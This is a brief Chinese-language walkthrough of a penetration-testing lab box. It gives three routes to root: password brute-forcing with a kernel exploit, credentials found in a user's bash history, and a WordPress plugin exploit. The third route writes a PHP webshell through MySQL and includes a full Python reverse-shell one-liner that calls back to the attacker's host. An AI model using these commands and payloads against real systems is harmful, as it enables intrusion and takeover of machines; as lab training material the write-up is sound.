方法1：
ftp匿名登录后发现note，提示elly和john，可以爆破elly的口令为ylle
登录后发现passwd所有用户信息，cat passwd | cut -d ‘:’ -f1 > etcpwdusers.txt，提取所有用户，爆破发现用户SHayslett的口令也是SHayslett，于是SSH登录
查看内核版本是4.4.0，用https://www.exploit-db.com/exploits/39772提权成功
方法2：
在方法1登录SSH之后，查看/home/JKanode/.bash_history，发现两个用户口令JKanode:thisimypassword，peter:JZQuyIN5
登录peter之后sudo -i，提权root成功
方法3：
扫描到12380端口的wordpress网站，http://192.168.107.4:12380/blogblog/wp-content/plugins/，发现advanced video插件，用39646.py获得配置文件，得到数据库口令
远程登录mysql并写入webshell，select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/sh.php';
可以转为反弹shell，sh.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.107.1",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
接下来同方法1或2，就可完成root提权


